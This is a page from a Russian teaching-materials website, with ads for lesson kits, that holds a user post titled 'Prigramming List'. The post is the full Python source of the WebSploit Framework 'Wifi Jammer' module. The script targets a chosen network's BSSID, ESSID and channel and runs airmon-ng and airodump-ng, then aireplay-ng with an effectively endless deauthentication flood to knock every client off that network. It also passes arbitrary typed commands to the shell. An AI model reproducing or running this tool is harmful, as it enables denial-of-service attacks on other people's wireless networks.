СДЕЛАЙТЕ СВОИ УРОКИ ЕЩЁ ЭФФЕКТИВНЕЕ, А ЖИЗНЬ СВОБОДНЕЕ

Благодаря готовым учебным материалам для работы в классе и дистанционно

Скидки до 50 % на комплекты
только до

Готовые ключевые этапы урока всегда будут у вас под рукой

Организационный момент

Проверка знаний

Объяснение материала

Закрепление изученного

Итоги урока

Prigramming List

Нажмите, чтобы узнать подробности

#!/usr/bin/env python
#
# WebSploit Framework Wifi Jammer module
# Created By 0x0ptim0us (Fardin Allahverdinazhand)
# Email : [email protected]
import os
import subprocess
from core import wcolors
from core import help
from time import sleep
options = ["wlan0", "", "", "mon0", "11"]
def wifi_jammer():
try:
line_1 = wcolors.color.UNDERL + wcolors.color.BLUE + "wsf" + wcolors.color.ENDC
line_1 += ":"
line_1 += wcolors.color.UNDERL + wcolors.color.BLUE + "Wifi_Jammer" + wcolors.color.ENDC
line_1 += " > "
com = raw_input(line_1)
com = com.lower()
if com[0:13] == 'set interface':
options[0] = com[14:20]
print "INTERFACE => ", options[0]
wifi_jammer()
elif com[0:9] == 'set bssid':
options[1] = com[10:]
print "BSSID => ", options[1]
wifi_jammer()
elif com[0:9] =='set essid':
options[2] = com[10:]
print "ESSID => ", options[2]
wifi_jammer()
elif com[0:7] =='set mon':
options[3] = com[8:12]
print "MON => ", options[3]
wifi_jammer()
elif com[0:11] =='set channel':
options[4] = com[12:14]
print "CHANNEL => ", options[4]
wifi_jammer()
elif com[0:2] =='os':
os.system(com[3:])
wifi_jammer()
elif com[0:4] =='help':
help.help()
wifi_jammer()
elif com[0:4] =='back':
pass
elif com[0:12] =='show options':
print ""
print "Options\t\t Value\t\t\t\t RQ\t Description"
print "--\t---\t\t\t-\t---"
print "interface\t"+options[0]+"\t\t\t\tyes\tWireless Interface Name"
print "bssid\t\t"+options[1]+"\t\t\t\tyes\tTarget BSSID Address"
print "essid\t\t"+options[2]+"\t\t\t\tyes\tTarget ESSID Name"
print "mon\t\t"+options[3]+"\t\t\t\tyes\tMonitor Mod(default)"
print "channel\t\t"+options[4]+"\t\t\t\tyes\tTarget Channel Number"
print ""
wifi_jammer()
elif com[0:4] =='scan':
xterm_1 = "airmon-ng start " + options[0]
xterm_2 = "xterm -e airodump-ng " + options[3] + " &"
subprocess.Popen(xterm_1, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
sleep(3)
os.system(xterm_2)
wifi_jammer()
elif com[0:3] =='run':
print (wcolors.color.GREEN + "[*]Attack Has Been Started on : " + options[2] + wcolors.color.ENDC)
xterm_3 = "xterm -e airodump-ng -c " + options[4] + " -bssid " + options[1] + " " + options[3] + " &"
os.system(xterm_3)
sleep(4)
xterm_4 = "xterm -e aireplay-ng -deauth 9999999999999 -o 1 -a " + options[1] + " -e " + options[2] + " " + options[3] + " &"
os.system(xterm_4)
sleep(1)
os.system(xterm_4)
wifi_jammer()
elif com[0:4] =='stop':
subprocess.Popen("killall xterm", stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
subprocess.Popen("killall aireplay", stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
wifi_jammer()
else:
print "Wrong Command => ", com
wifi_jammer()
except(KeyboardInterrupt):
print(wcolors.color.RED + "\n[*] (Ctrl + C ) Detected, Module Exit" + wcolors.color.ENDC)
02.04.2018 19:47


Рекомендуем курсы ПК и ПП